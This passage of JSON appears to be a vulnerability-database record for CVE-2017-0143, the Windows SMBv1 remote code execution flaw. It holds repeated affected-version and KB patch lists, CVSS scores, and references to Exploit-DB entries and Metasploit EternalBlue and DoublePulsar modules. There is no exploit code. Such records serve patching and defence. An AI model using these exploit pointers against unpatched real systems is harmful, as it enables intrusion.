"msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, 
{"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": 
"KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": 
"KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", 
"kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-20T02:45:21", "differentElements": ["msAffectedSoftware"], "edition": 67}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "f34700f5fafe59f3b729f742aac31bd5", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-20T04:47:39", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": 
"talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:BC214880895281474C1A8EF7B7D98C13"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-29702", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142181"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", 
"RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-20T02:45:21", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-20T02:45:21", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3177186", "KBMS16-110, 3187754", "KB3212646", "KB4013198", "KB4012215", "KB4012217", "KB4012213", "KB4013429", "KB3210721", "KB4012212", "KB4012606", "KB3213986", "KB3205409", "KB3210720", "KB4012216", "KB4012214", "KB4012598", "KB3205401"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", 
"kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 
for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 
Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": 
"Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 
Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", 
"msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 
x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 
